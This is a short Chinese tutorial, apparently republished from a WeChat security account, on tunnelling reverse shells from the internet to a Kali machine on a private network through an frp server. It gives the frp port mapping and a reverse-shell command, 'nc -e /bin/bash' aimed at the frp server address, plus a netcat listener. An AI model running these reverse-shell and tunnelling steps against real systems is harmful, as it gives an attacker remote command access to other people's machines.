前言:
很多时候kali都是处于我们内网的情况下,同时我们也知道,如果我们要进行反弹shell的话是一定要知道公网ip的,那么如何使得受害主机能正常反弹shell,同时我们的kali可以接受到信息呢?
正文:
frp是一款非常流行的内网穿透工具,我们这里就要利用frp来进行内网穿透。首先我们确定一下我们需要做什么,我们需要一台公网ip的服务器来当作我们的frp服务器,kali 我们的攻击机 处于内网环境中。
https://github.com/fatedier/frp
首先我们去frp的github链接分别下载到我们的公网vps上和我们的kali上
首先来搭建我们的frp服务器,过程也非常简单:
首先将压缩包进行一个压缩
tar -zxvf frp_0.33.0_linux_amd64.tar.gz
解压之后的文件夹内容如下
可以看到里面有两个一个是frpc 一个是frps
frpc 就代表着 frp client
frps 就代表着 frp server
我们先搭建我们的服务器,所以也就是frps
我们不需要进行修改,这里代表的就是我们运行frp这个服务的端口是7000
然后我们运行我们的frp服务
接下来配置我们的frp客户端
第一个是红框是我们之前搭建的frp服务器的 ip
第二个红框就是我们kali的ip
local_port 就是我们kali后面监听的端口
remote_port = 4444 就是我们frp服务器上的端口
运行本地客户端
反弹shell测试
在kali中利用msf工具时为了反弹shell常常需要设定本地监听端口,而虚拟机中的kali由于没有公网地址因此较难对公网中的服务器展开测试,通过frp代理很好的解决了这个问题在上面的配置中,我配置了一个基于tcp的4444端口,映射到虚拟机kali的4444端口作为反弹shell的监听端口,这样就能够利用虚拟机kali对公网服务器进行测试,具体展开测试如下:首先在kali上开启监听,接下来用另一台能联网的服务器反弹shell
我们在反弹shell的过程中地址是 公网ip
nc -e /bin/bash 【frp服务器地址】 【frp映射TCP端口】
我们的frp服务器的4444 接受到我们的请求之后 会根据配置文件转发到我们kali的4444端口上,这样反弹shell就可以成功了
然后kali上监听 nc -lvnp 4444
成功执行命令
然后我们的frp服务器上也显示了对应的日志
工具下载:
关注公众号网络安全学习爱好者后台回复关键:frp获取百度网盘下载链接
原文始发于微信公众号(网络安全学习爱好者):利用frp内网穿透实现反弹shell
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论